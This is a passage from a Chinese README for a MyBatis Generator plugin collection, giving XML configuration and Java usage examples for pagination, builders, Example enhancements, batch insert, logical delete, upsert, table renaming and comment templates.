通过配置startPage影响Example中的page方法开始分页的页码,默认分页从0开始 --> <property name="startPage" value="0"/> </plugin> ``` 使用: ```java public class TbExample { /** * This field was generated by MyBatis Generator. * This field corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ protected Integer offset; /** * This field was generated by MyBatis Generator. * This field corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ protected Integer rows; /** * This method was generated by MyBatis Generator. * This method corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ public TbExample limit(Integer rows) { this.rows = rows; return this; } /** * This method was generated by MyBatis Generator. * This method corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ public TbExample limit(Integer offset, Integer rows) { this.offset = offset; this.rows = rows; return this; } /** * This method was generated by MyBatis Generator. * This method corresponds to the database table tb * * @mbg.generated * @project https://github.com/itfsw/mybatis-generator-plugin */ public TbExample page(Integer page, Integer pageSize) { this.offset = page * pageSize; // !!! 如果配置了startPage且不为0 // this.offset = (page - startPage) * pageSize; this.rows = pageSize; return this; } // offset 和 rows 的getter&setter // 修正了clear方法 /** * This method was generated by MyBatis Generator. * This method corresponds to the database table tb * * @mbg.generated */ public void clear() { oredCriteria.clear(); orderByClause = null; distinct = false; rows = null; offset = null; } } public class Test { public static void main(String[] args) { this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1GreaterThan(1) .example() .limit(10) // 查询前10条 .limit(10, 10) // 查询10~20条 .page(1, 10) // 查询第2页数据(每页10条) ); } } ``` ### 3. 数据Model链式构建插件 这个是仿jquery的链式调用强化了表的Model的赋值操作 插件: ```xml <!-- 数据Model链式构建插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.ModelBuilderPlugin"/> ``` 使用: ```java public class Test { public static void main(String[] args) { // 直接new表Model的内部Builder类,赋值后调用build()方法返回对象 Tb table = new Tb.Builder() .field1("xx") .field2("xx") .field3("xx") .field4("xx") .build(); // 或者使用builder静态方法创建Builder Tb table = Tb.builder() .field1("xx") .field2("xx") .field3("xx") .field4("xx") .build(); } } ``` ### 4. Example 增强插件(example,andIf,orderBy) * Criteria的快速返回example()方法。 * ~~Criteria链式调用增强,以前如果有按条件增加的查询语句会打乱链式查询构建,现在有了andIf(boolean ifAdd, CriteriaAdd add)方法可一直使用链式调用下去。~~ * Example增强了setOrderByClause方法,新增orderBy(String orderByClause)、orderBy(String ... orderByClauses)方法直接返回example,增强链式调用,配合数据Model属性对应Column获取插件(ModelColumnPlugin)使用效果更佳。 * 增加基于column的操作,当配置了[数据Model属性对应Column获取插件(ModelColumnPlugin)](#8-数据model属性对应column获取插件)插件时,提供column之间的比对操作。 * 增加createCriteria静态方法newAndCreateCriteria简写example的创建。 * 增加when方法(Example和Criteria都有),方便根据不同条件附加对应操作。 插件: ```xml <!-- Example Criteria 增强插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.ExampleEnhancedPlugin"> <!-- 是否支持已经过时的andIf方法(推荐使用when代替),默认支持 --> <property name="enableAndIf" value="true"/> </plugin> ``` 使用: ```java public class Test { public static void main(String[] args) { // -----------------------------------example----------------------------------- // 表Example.Criteria增加了工厂方法example()支持,使用后可链式构建查询条件使用example()返回Example对象 this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1EqualTo(1) .andField2EqualTo("xxx") .example() ); // ----------------- andIf (@Deprecated 尽量使用when代替) --------------------- // Criteria增强了链式调用,现在一些按条件增加的查询条件不会打乱链式调用了 // old TbExample oldEx = new TbExample(); TbExample.Criteria criteria = oldEx .createCriteria() .andField1EqualTo(1) .andField2EqualTo("xxx"); // 如果随机数大于0.5,附加Field3查询条件 if (Math.random() > 0.5){ criteria.andField3EqualTo(2) .andField4EqualTo(new Date()); } this.tbMapper.selectByExample(oldEx); // new this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1EqualTo(1) .andField2EqualTo("xxx") // 如果随机数大于0.5,附加Field3查询条件 .andIf(Math.random() > 0.5, new TbExample.Criteria.ICriteriaAdd() { @Override public TbExample.Criteria add(TbExample.Criteria add) { return add.andField3EqualTo(2) .andField4EqualTo(new Date()); } }) // 当然最简洁的写法是采用java8的Lambda表达式,当然你的项目是Java8+ .andIf(Math.random() > 0.5, add -> add .andField3EqualTo(2) .andField4EqualTo(new Date()) ) .example() ); // -----------------------------------when----------------------------------- this.tbMapper.selectByExample( TbExample.newAndCreateCriteria() // 如果随机数大于1,附加Field3查询条件 .when(Math.random() > 1, new TbExample.ICriteriaWhen() { @Override public void criteria(TbExample.Criteria criteria) { criteria.andField3EqualTo(2); } }) // 当然最简洁的写法是采用java8的Lambda表达式,当然你的项目是Java8+ .when(Math.random() > 1, criteria -> criteria.andField3EqualTo(2)) // 也支持 if else 这种写法 .when(Math.random() > 1, criteria -> criteria.andField3EqualTo(2), criteria -> criteria.andField3EqualTo(3)) .example() // example上也支持 when 方法 .when(true, example -> example.orderBy("field1 DESC")) ); // -----------------------------------orderBy----------------------------------- // old TbExample ex = new TbExample(); ex.createCriteria().andField1GreaterThan(1); ex.setOrderByClause("field1 DESC"); this.tbMapper.selectByExample(ex); // new this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1GreaterThan(1) .example() .orderBy("field1 DESC") // 这个配合数据Model属性对应Column获取插件(ModelColumnPlugin)使用 .orderBy(Tb.Column.field1.asc(), Tb.Column.field3.desc()) ); // -----------------------------------column----------------------------------- this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1EqualToColumn(Tb.Column.field2) // where field1 = field2 .andField1NotEqualToColumn(Tb.Column.field2) // where field1 <> field2 .andField1GreaterThanColumn(Tb.Column.field2) // where field1 > field2 .andField1GreaterThanOrEqualToColumn(Tb.Column.field2) // where field1 >= field2 .andField1LessThanColumn(Tb.Column.field2) // where field1 < field2 .andField1LessThanOrEqualToColumn(Tb.Column.field2) // where field1 <= field2 .example() ); // ---------------------------- static createCriteria ----------------------- // simple this.tbMapper.selectByExample( new TbExample() .createCriteria() .example() ); // new this.tbMapper.selectByExample( TbExample.newAndCreateCriteria() .example() ); } } ``` ### 5. Example 目标包修改插件 Mybatis Generator 插件默认把Model类和Example类都生成到一个包下,这样该包下类就会很多不方便区分,该插件目的就是把Example类独立到一个新包下,方便查看。 插件: ```xml <!-- Example 目标包修改插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.ExampleTargetPlugin"> <!-- 修改Example类生成到目标包下 --> <property name="targetPackage" value="com.itfsw.mybatis.generator.dao.example"/> </plugin> ``` ### 6. 批量插入插件 提供了批量插入batchInsert和batchInsertSelective方法,需配合数据Model属性对应Column获取插件(ModelColumnPlugin)插件使用,实现类似于insertSelective插入列! >warning: 插件生成的batchInsertSelective方法在使用时必须指定selective列,因为插件本身是预编译生成sql,对于批量数据是无法提供类似insertSelective非空插入的方式的; 插件: ```xml <!-- 批量插入插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.BatchInsertPlugin"> <!-- 开启后可以实现官方插件根据属性是否为空决定是否插入该字段功能 !需开启allowMultiQueries=true多条sql提交操作,所以不建议使用!插件默认不开启 --> <property name="allowMultiQueries" value="false"/> </plugin> ``` 使用: ```java public class Test { public static void main(String[] args) { // 构建插入数据 List<Tb> list = new ArrayList<>(); list.add( Tb.builder() .field1(0) .field2("xx0") .field3(0) .createTime(new Date()) .build() ); list.add( Tb.builder() .field1(1) .field2("xx1") .field3(1) .createTime(new Date()) .build() ); // 普通插入,插入所有列 this.tbMapper.batchInsert(list); // !!!下面按需插入指定列(类似于insertSelective),需要数据Model属性对应Column获取插件(ModelColumnPlugin)插件 this.tbMapper.batchInsertSelective(list, Tb.Column.field1, Tb.Column.field2, Tb.Column.field3, Tb.Column.createTime); // 或者排除某些列 this.tbMapper.batchInsertSelective(list, Tb.Column.excludes(Tb.Column.id, Tb.Column.delFlag)); } } ``` ### 7. 逻辑删除插件 因为很多实际项目数据都不允许物理删除,多采用逻辑删除,所以单独为逻辑删除做了一个插件,方便使用。 - 增加logicalDeleteByExample和logicalDeleteByPrimaryKey方法; - 增加selectByPrimaryKeyWithLogicalDelete方法([[pull#12]](https://github.com/itfsw/mybatis-generator-plugin/pull/12)); - 查询构造工具中增加逻辑删除条件andLogicalDeleted(boolean); - 数据Model增加逻辑删除条件andLogicalDeleted(boolean); - 增加逻辑删除常量IS_DELETED(已删除 默认值)、NOT_DELETED(未删除 默认值)([[issues#11]](https://github.com/itfsw/mybatis-generator-plugin/issues/11)); - 增加逻辑删除枚举; >warning: 注意在配合[状态枚举生成插件(EnumTypeStatusPlugin)](#21-状态枚举生成插件)使用时的注释格式,枚举数量必须大于等于2,且逻辑删除和未删除的值能在枚举中找到。 插件: ```xml <xml> <!-- 逻辑删除插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.LogicalDeletePlugin"> <!-- 这里配置的是全局逻辑删除列和逻辑删除值,当然在table中配置的值会覆盖该全局配置 --> <!-- 逻辑删除列类型只能为数字、字符串或者布尔类型 --> <property name="logicalDeleteColumn" value="del_flag"/> <!-- 逻辑删除-已删除值 --> <property name="logicalDeleteValue" value="9"/> <!-- 逻辑删除-未删除值 --> <property name="logicalUnDeleteValue" value="0"/> <!-- 是否生成逻辑删除常量(只有开启时 logicalDeleteConstName、logicalUnDeleteConstName 才生效) --> <property name="enableLogicalDeleteConst" value="true"/> <!-- 逻辑删除常量名称,不配置默认为 IS_DELETED --> <property name="logicalDeleteConstName" value="IS_DELETED"/> <!-- 逻辑删除常量(未删除)名称,不配置默认为 NOT_DELETED --> <property name="logicalUnDeleteConstName" value="NOT_DELETED"/> </plugin> <table tableName="tb"> <!-- 这里可以单独表配置逻辑删除列和删除值,覆盖全局配置 --> <property name="logicalDeleteColumn" value="del_flag"/> <property name="logicalDeleteValue" value="1"/> <property name="logicalUnDeleteValue" value="-1"/> </table> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // 1. 逻辑删除ByExample this.tbMapper.logicalDeleteByExample( new TbExample() .createCriteria() .andField1EqualTo(1) .example() ); // 2. 逻辑删除ByPrimaryKey this.tbMapper.logicalDeleteByPrimaryKey(1L); // 3. 同时Example中提供了一个快捷方法来过滤逻辑删除数据 this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1EqualTo(1) // 新增了一个andDeleted方法过滤逻辑删除数据 .andLogicalDeleted(true) // 当然也可直接使用逻辑删除列的查询方法,我们数据Model中定义了一个逻辑删除常量DEL_FLAG .andDelFlagEqualTo(Tb.IS_DELETED) .example() ); // 4. 逻辑删除和未删除常量 Tb tb = Tb.builder() .delFlag(Tb.IS_DELETED) // 删除 .delFlag(Tb.NOT_DELETED) // 未删除 .build() .andLogicalDeleted(true); // 也可以在这里使用true|false设置逻辑删除 // 5. selectByPrimaryKeyWithLogicalDelete V1.0.18 版本增加 // 因为之前觉得既然拿到了主键这种查询没有必要,但是实际使用中可能存在根据主键判断是否逻辑删除的情况,这种场景还是有用的 this.tbMapper.selectByPrimaryKeyWithLogicalDelete(1, true); // 6. 使用逻辑删除枚举 Tb tb = Tb.builder() .delFlag(Tb.DelFlag.IS_DELETED) // 删除 .delFlag(Tb.DelFlag.NOT_DELETED) // 未删除 .build() .andLogicalDeleted(true); // 也可以在这里使用true|false设置逻辑删除 } } ``` 通过注解覆盖逻辑删除配置 ```sql CREATE TABLE `tb` ( `id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT '注释1', `del_flag` smallint(3) COMMENT '注释[enable(1):第一项必须是代表未删除, disable(0):第二项必须是代表已删除, other(2):当然还可以附加其他状态]', PRIMARY KEY (`id`) ); ``` ```java /** * 生成的Tb会根据注释覆盖逻辑删除配置 */ public class Tb { public static final Short ENABLE = DelFlag.ENABLE.value(); public static final Short DISABLE = DelFlag.DISABLE.value(); public enum DelFlag { ENABLE(new Short("1"), "第一项必须是代表未删除"), DISABLE(new Short("0"), "第二项必须是代表已删除"), OTHER(new Short("2"), "当然还可以附加其他状态"); private final Short value; private final String name; DelFlag(Short value, String name) { this.value = value; this.name = name; } public Short getValue() { return this.value; } public Short value() { return this.value; } public String getName() { return this.name; } } } ``` ### 8. 数据Model属性对应Column获取插件 项目中我们有时需要获取数据Model对应数据库字段的名称,一般直接根据数据Model的属性就可以猜出数据库对应column的名字,可是有的时候当column使用了columnOverride或者columnRenamingRule时就需要去看数据库设计了,所以提供了这个插件获取model对应的数据库Column。 * 配合Example Criteria 增强插件(ExampleEnhancedPlugin)使用,这个插件还提供了asc()和desc()方法配合Example的orderBy方法效果更佳。 * 配合批量插入插件(BatchInsertPlugin)使用,batchInsertSelective(@Param("list") List<XXX> list, @Param("selective") XXX.Column ... insertColumns)。 * 提供静态excludes方法来进行快速反选。 插件: ```xml <!-- 数据Model属性对应Column获取插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.ModelColumnPlugin"/> ``` 使用: ```java public class Test { public static void main(String[] args) { // 1. 获取Model对应column String column = Tb.Column.createTime.value(); // 2. 配合Example Criteria 增强插件(ExampleEnhancedPlugin)使用orderBy方法 // old this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1GreaterThan(1) .example() .orderBy("field1 DESC, field3 ASC") ); // better this.tbMapper.selectByExample( new TbExample() .createCriteria() .andField1GreaterThan(1) .example() .orderBy(Tb.Column.field1.desc(), Tb.Column.field3.asc()) ); // 3. 配合批量插入插件(BatchInsertPlugin)使用实现按需插入指定列 List<Tb> list = new ArrayList<>(); list.add( Tb.builder() .field1(0) .field2("xx0") .field3(0) .field4(new Date()) .build() ); list.add( Tb.builder() .field1(1) .field2("xx1") .field3(1) .field4(new Date()) .build() ); // 这个会插入表所有列 this.tbMapper.batchInsert(list); // 下面按需插入指定列(类似于insertSelective) this.tbMapper.batchInsertSelective(list, Tb.Column.field1, Tb.Column.field2, Tb.Column.field3, Tb.Column.createTime); // 4. excludes 方法 this.tbMapper.batchInsertSelective(list, Tb.Column.excludes(Tb.Column.id, Tb.Column.delFlag)); // 5. all 方法 this.tbMapper.batchInsertSelective(list, Tb.Column.all()); } } ``` ### 9. 存在即更新插件 1. 使用MySQL的[“insert ... on duplicate key update”](https://dev.mysql.com/doc/refman/5.7/en/insert-on-duplicate.html)实现存在即更新操作,简化数据入库操作([[issues#2]](https://github.com/itfsw/mybatis-generator-plugin/issues/2))。 2. 在开启allowMultiQueries=true(默认不会开启)情况下支持upsertByExample,upsertByExampleSelective操作,但强力建议不要使用(需保证团队没有使用statement提交sql,否则会存在sql注入风险)([[issues#2]](https://github.com/itfsw/mybatis-generator-plugin/issues/2))。 插件: ```xml <!-- 存在即更新插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.UpsertPlugin"> <!-- 支持upsertByExample,upsertByExampleSelective操作 !需开启allowMultiQueries=true多条sql提交操作,所以不建议使用!插件默认不开启 --> <property name="allowMultiQueries" value="false"/> <!-- 开启批量功能,支持batchUpsert,batchUpsertWithBLOBs,batchUpserSelective !这几个方法中无法支持IncrementsPlugin的方法!插件默认不开启 --> <property name="allowBatchUpsert" value="fasle"/> </plugin> ``` 使用: ```java public class Test { public static void main(String[] args) { // 1. 未入库数据入库,执行insert Tb tb = Tb.builder() .field1(1) .field2("xx0") .delFlag(Tb.DEL_FLAG_ON) .build(); int k0 = this.tbMapper.upsert(tb); // 2. 已入库数据再次入库,执行update(!!需要注意如触发update其返回的受影响行数为2) tb.setField2("xx1"); int k1 = this.tbMapper.upsert(tb); // 3. 类似insertSelective实现选择入库 Tb tb1 = Tb.builder() .field1(1) .field2("xx0") .build(); int k2 = this.tbMapper.upsertSelective(tb1); tb1.setField2("xx1"); int k3 = this.tbMapper.upsertSelective(tb1); // --------------------------------- allowMultiQueries=true ------------------------------ // 4. 开启allowMultiQueries后增加upsertByExample,upsertByExampleSelective但强力建议不要使用(需保证团队没有使用statement提交sql,否则会存在sql注入风险) Tb tb2 = Tb.builder() .field1(1) .field2("xx0") .field3(1003) .delFlag(Tb.DEL_FLAG_ON) .build(); int k4 = this.tbMapper.upsertByExample(tb2, new TbExample() .createCriteria() .andField3EqualTo(1003) .example() ); tb2.setField2("xx1"); // !!! upsertByExample,upsertByExampleSelective触发更新时,更新条数返回是有问题的,这里只会返回0 // 这是mybatis自身问题,也是不怎么建议开启allowMultiQueries功能原因之一 int k5 = this.tbMapper.upsertByExample(tb2, new TbExample() .createCriteria() .andField3EqualTo(1003) .example() ); // upsertByExampleSelective 用法类似 // 当Model WithBLOBs 存在时上述方法增加对应的 WithBLOBs 方法,举例如下: TbWithBLOBs tb3 = Tb.builder() .field1(1) .field2("xx0") .delFlag(Tb.DEL_FLAG_ON) .build(); int k6 = this.tbMapper.upsertWithBLOBs(tb); // --------------------------------- allowBatchUpsert=true ------------------------------ List<Tb> list = new ArrayList<>(); list.add( Tb.builder() .field1(0) .field2("xx0") .field3(0) .field4(new Date()) .build() ); list.add( Tb.builder() .field1(1) .field2("xx1") .field3(1) .field4(new Date()) .build() ); this.tbMapper.batchUpsert(list); // 对于BLOBs 有batchUpsertWithBLOBs方法 this.tbMapper.batchUpsertSelective(list, Tb.Column.field1, Tb.Column.field2, Tb.Column.field3, Tb.Column.createTime); this.tbMapper.batchUpsertSelective(list, Tb.Column.excludes(Tb.Column.id, Tb.Column.delFlag)); // 排除某些列 } } ``` ### 10. Selective选择插入更新增强插件 项目中往往需要指定某些字段进行插入或者更新,或者把某些字段进行设置null处理,这种情况下原生xxxSelective方法往往不能达到需求,因为它的判断条件是对象字段是否为null,这种情况下可使用该插件对xxxSelective方法进行增强。 >warning: 以前老版本(1.1.x)插件处理需要指定的列时是放入Model中指定的,但在实际使用过程中有同事反馈这个处理有点反直觉,导致某些新同事不能及时找到对应方法,而且和增强的SelectSelectivePlugin以及UpsertSelective使用方式都不一致,所以统一修改之。 插件: ```xml <!-- Selective选择插入更新增强插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.SelectiveEnhancedPlugin"/> ``` 使用: ```java public class Test { public static void main(String[] args) { // ------------------------------ 新版本(SelectiveEnhancedPlugin)-------------------------------- // 1. 指定插入或更新字段 Tb tb = Tb.builder() .field1(1) .field2("xx2") .field3(1) .createTime(new Date()) .build(); // 只插入或者更新field1,field2字段 this.tbMapper.insertSelective(tb, Tb.Column.field1, Tb.Column.field2); this.tbMapper.updateByExampleSelective( tb, new TbExample() .createCriteria() .andIdEqualTo(1l) .example(), Tb.Column.field1, Tb.Column.field2 ); this.tbMapper.updateByPrimaryKeySelective(tb, Tb.Column.field1, Tb.Column.field2); this.tbMapper.upsertSelective(tb, Tb.Column.field1, Tb.Column.field2); this.tbMapper.upsertByExampleSelective( tb, new TbExample() .createCriteria() .andField3EqualTo(1) .example(), Tb.Column.field1, Tb.Column.field2 ); // 2. 更新某些字段为null this.tbMapper.updateByPrimaryKeySelective( Tb.builder() .id(1l) .field1(null) // 方便展示,不用设也可以 .build(), Tb.Column.field1 ); // 3. 排除某些列 this.tbMapper.insertSelective(tb, Tb.Column.excludes(Tb.Column.id, Tb.Column.delFlag)); } } ``` ### 11. Table增加前缀插件 项目中有时会遇到配置多数据源对应多业务的情况,这种情况下可能会出现不同数据源出现重复表名,造成异常冲突。 该插件允许为表增加前缀,改变最终生成的Model、Mapper、Example类名以及xml名。 >warning: 使用[Table重命名插件](12-table重命名插件)可以实现相同功能! >warning: 官方最新版本中已提供domainObjectRenamingRule支持(可以配合[表重命名配置插件](#18-表重命名配置插件)进行全局配置)! ```xml <table tableName="tb"> <domainObjectRenamingRule searchString="^" replaceString="DB1" /> </table> ``` 插件: ```xml <xml> <!-- Table增加前缀插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.TablePrefixPlugin"> <!-- 这里配置的是全局表前缀,当然在table中配置的值会覆盖该全局配置 --> <property name="prefix" value="Cm"/> </plugin> <table tableName="tb"> <!-- 这里可以单独表配置前缀,覆盖全局配置 --> <property name="suffix" value="Db1"/> </table> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // Tb 表对应的Model、Mapper、Example类都增加了Db1的前缀 // Model类名: Tb -> Db1Tb // Mapper类名: TbMapper -> Db1TbMapper // Example类名: TbExample -> Db1TbExample // xml文件名: TbMapper.xml -> Db1TbMapper.xml } } ``` ### 12. Table重命名插件 插件由来: 记得才开始工作时某个隔壁项目组的坑爹项目,由于某些特定的原因数据库设计表名为t1~tn,字段名为f1~fn。 这种情况下如何利用Mybatis Generator生成可读的代码呢,字段可以用columnOverride来替换,Model、Mapper等则需要使用domainObjectName+mapperName来实现方便辨识的代码。 >该插件解决:domainObjectName+mapperName?好吧我想简化一下,所以直接使用tableOverride(仿照columnOverride)来实现便于配置的理解。 某些DBA喜欢在数据库设计时使用t_、f_这种类似的设计([[issues#4]](https://github.com/itfsw/mybatis-generator-plugin/issues/4)), 这种情况下我们就希望能有类似[columnRenamingRule](http://www.mybatis.org/generator/configreference/columnRenamingRule.html)这种重命名插件来修正最终生成的Model、Mapper等命名。 >该插件解决:使用正则替换table生成的Model、Example、Mapper等命名。 项目中有时会遇到配置多数据源对应多业务的情况,这种情况下可能会出现不同数据源出现重复表名,造成异常冲突。 该插件可以实现和[Table增加前缀插件](11-table增加前缀插件)相同的功能,仿照如下配置。 ```xml <property name="searchString" value="^"/> <property name="replaceString" value="DB1"/> ``` >warning: 官方最新版本中已提供domainObjectRenamingRule支持(可以配合[表重命名配置插件](#18-表重命名配置插件)进行全局配置)! ```xml <table tableName="tb"> <domainObjectRenamingRule searchString="^T" replaceString="" /> </table> ``` 插件: ```xml <xml> <!-- Table重命名插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.TableRenamePlugin"> <!-- 可根据具体需求确定是否配置 --> <property name="searchString" value="^T"/> <property name="replaceString" value=""/> </plugin> <table tableName="tb"> <!-- 这个优先级最高,会忽略searchString、replaceString的配置 --> <property name="tableOverride" value="TestDb"/> </table> </xml> ``` 使用: ```java public class Test { public static void main(String[] args) { // 1. 使用searchString和replaceString时,和Mybatis Generator一样使用的是java.util.regex.Matcher.replaceAll去进行正则替换 // 表: T_USER // Model类名: TUser -> User // Mapper类名: TUserMapper -> UserMapper // Example类名: TUserExample -> UserExample // xml文件名: TUserMapper.xml -> UserMapper.xml // 2. 使用表tableOverride时,该配置优先级最高 // 表: T_BOOK // Model类名: TBook -> TestDb // Mapper类名: TBookMapper -> TestDbMapper // Example类名: TBookExample -> TestDbExample // xml文件名: TBookMapper.xml -> TestDbMapper.xml } } ``` ### 13. 自定义注释插件 Mybatis Generator是原生支持自定义注释的(commentGenerator配置type属性),但使用比较麻烦需要自己实现CommentGenerator接口并打包配置赖等等。 该插件借助freemarker极佳的灵活性实现了自定义注释的快速配置。 >warning: 下方提供了一个参考模板,需要注意${mgb}的输出,因为Mybatis Generator就是通过该字符串判断是否为自身生成代码进行覆盖重写。 >warning: 请注意拷贝参考模板注释前方空格,idea等工具拷贝进去后自动格式化会造成格式错乱。 >warning: 模板引擎采用的是freemarker所以一些freemarker指令参数(如:<#if xx></#if>、${.now?string("yyyy-MM-dd HH:mm:ss")})都是可以使用的,请自己尝试。 >warning: [默认模板](https://github.com/itfsw/mybatis-generator-plugin/blob/master/src/main/resources/default-comment.ftl) | 注释ID | 传入参数 | 备注 | | ----- | ----- | ---- | | addJavaFileComment | mgb<br>[compilationUnit](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/java/CompilationUnit.java) | Java文件注释 | | addComment | mgb<br>[xmlElement](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/xml/XmlElement.java) | Xml节点注释 | | addRootComment | mgb<br>[rootElement](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/xml/XmlElement.java) | Xml根节点注释 | | addFieldComment | mgb<br>[field](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/java/Field.java)<br>[introspectedTable](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/IntrospectedTable.java)<br>[introspectedColumn](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/IntrospectedColumn.java) | Java 字段注释(非生成Model对应表字段时,introspectedColumn可能不存在) | | addModelClassComment | mgb<br>[topLevelClass](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/java/TopLevelClass.java)<br>introspectedTable | 表Model类注释 | | addClassComment | mgb<br>[innerClass](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/java/InnerClass.java)<br>introspectedTable | 类注释 | | addEnumComment | mgb<br>[innerEnum](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/java/InnerEnum.java)<br>introspectedTable | 枚举注释 | | addInterfaceComment | mgb<br>[innerInterface](https://github.com/itfsw/mybatis-generator-plugin/blob/master/src/main/java/com/itfsw/mybatis/generator/plugins/utils/enhanced/InnerInterface.java)<br>introspectedTable | 接口注释(itfsw插件新增类型) | | addGetterComment | mgb<br>[method](https://github.com/mybatis/generator/blob/master/core/mybatis-generator-core/src/main/java/org/mybatis/generator/api/dom/java/Method.java)<br>introspectedTable<br>introspectedColumn | getter方法注释(introspectedColumn可能不存在) | | addSetterComment | mgb<br>method<br>introspectedTable<br>introspectedColumn | setter方法注释(introspectedColumn可能不存在) | | addGeneralMethodComment | mgb<br>method<br>introspectedTable | 方法注释 | 插件: ```xml <xml> <!-- 自定义注释插件 --> <plugin type="com.itfsw.mybatis.generator.plugins.CommentPlugin"> <!-- 自定义模板路径 --> <property name="template" value="src/main/resources/mybatis-generator-comment.ftl" /> </plugin> </xml> ``` 使用([参考模板](https://github.com/itfsw/mybatis-generator-plugin/blob/master/src/main/resources/default-comment.ftl)): ```xml <?xml version="1.0" encoding="UTF-8"?> <template> <!-- ############################################################################################################# /** * This method is called to add a file level comment to a generated java file. This method could be used to add a * general file comment (such as a copyright notice). However, note that the Java file merge function in Eclipse * does not deal with this comment. If you run the generator repeatedly, you will only retain the comment from the * initial run. * <p> * * The default implementation does nothing. * * @param compilationUnit * the compilation unit */ --> <comment ID="addJavaFileComment"></comment> <!-- ############################################################################################################# /** * This method should add a suitable comment as a child element of the specified xmlElement to warn users that the * element was generated and is subject to regeneration. * * @param xmlElement * the xml element */ --> <comment ID="addComment"><![CDATA[ <!-- WARNING - ${mgb} This element is automatically generated by MyBatis Generator, do not modify. @project https://github.com/itfsw/mybatis-generator-plugin --> ]]></comment> <!-- ############################################################################################################# /** * This method is called to add a comment as the first child of the root element. This method could be used to add a * general file comment (such as a copyright notice). However, note that the XML file merge function does not deal * with this comment. If you run the generator repeatedly, you will only retain the comment from the initial run. * <p> * * The default implementation does nothing. * * @param rootElement * the root element */ --> <comment ID="addRootComment"></comment> <!-- ############################################################################################################# /** * This method should add a Javadoc comment to the specified field. The field is related to the specified table and * is used to hold the value of the specified column. * <p> * * <b>Important:</b> This method should add a the nonstandard JavaDoc tag "@mbg.generated" to the comment. Without * this tag, the Eclipse based Java merge feature will fail. * * @param field * the field * @param introspectedTable * the introspected table * @param introspectedColumn * the introspected column */ --> <comment ID="addFieldComment"><![CDATA[ <#if introspectedColumn??> /** <#if introspectedColumn.remarks?? && introspectedColumn.remarks != ''> * Database Column Remarks: <#list introspectedColumn.remarks?split("\n") as remark> * ${remark} </#list> </#if> * * This field was generated by MyBatis Generator. * This field corresponds to the database column ${introspectedTable.fullyQualifiedTable}.${introspectedColumn.actualColumnName} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ <#else> /** * This field was generated by MyBatis Generator. * This field corresponds to the database table ${introspectedTable.fullyQualifiedTable} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ </#if> ]]></comment> <!-- ############################################################################################################# /** * Adds a comment for a model class. The Java code merger should * be notified not to delete the entire class in case any manual * changes have been made. So this method will always use the * "do not delete" annotation. * * Because of difficulties with the Java file merger, the default implementation * of this method should NOT add comments. Comments should only be added if * specifically requested by the user (for example, by enabling table remark comments). * * @param topLevelClass * the top level class * @param introspectedTable * the introspected table */ --> <comment ID="addModelClassComment"><![CDATA[ /** <#if introspectedTable.remarks?? && introspectedTable.remarks != ''> * Database Table Remarks: <#list introspectedTable.remarks?split("\n") as remark> * ${remark} </#list> </#if> * * This class was generated by MyBatis Generator. * This class corresponds to the database table ${introspectedTable.fullyQualifiedTable} * * ${mgb} do_not_delete_during_merge * @project https://github.com/itfsw/mybatis-generator-plugin */ ]]></comment> <!-- ############################################################################################################# /** * Adds the inner class comment. * * @param innerClass * the inner class * @param introspectedTable * the introspected table * @param markAsDoNotDelete * the mark as do not delete */ --> <comment ID="addClassComment"><![CDATA[ /** * This class was generated by MyBatis Generator. * This class corresponds to the database table ${introspectedTable.fullyQualifiedTable} * * ${mgb}<#if markAsDoNotDelete?? && markAsDoNotDelete> do_not_delete_during_merge</#if> * @project https://github.com/itfsw/mybatis-generator-plugin */ ]]></comment> <!-- ############################################################################################################# /** * Adds the enum comment. * * @param innerEnum * the inner enum * @param introspectedTable * the introspected table */ --> <comment ID="addEnumComment"><![CDATA[ /** * This enum was generated by MyBatis Generator. * This enum corresponds to the database table ${introspectedTable.fullyQualifiedTable} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ ]]></comment> <!-- ############################################################################################################# /** * Adds the interface comment. * * @param innerInterface * the inner interface * @param introspectedTable * the introspected table */ --> <comment ID="addInterfaceComment"><![CDATA[ /** * This interface was generated by MyBatis Generator. * This interface corresponds to the database table ${introspectedTable.fullyQualifiedTable} * * ${mgb} * @project https://github.com/itfsw/mybatis-generator-plugin */ 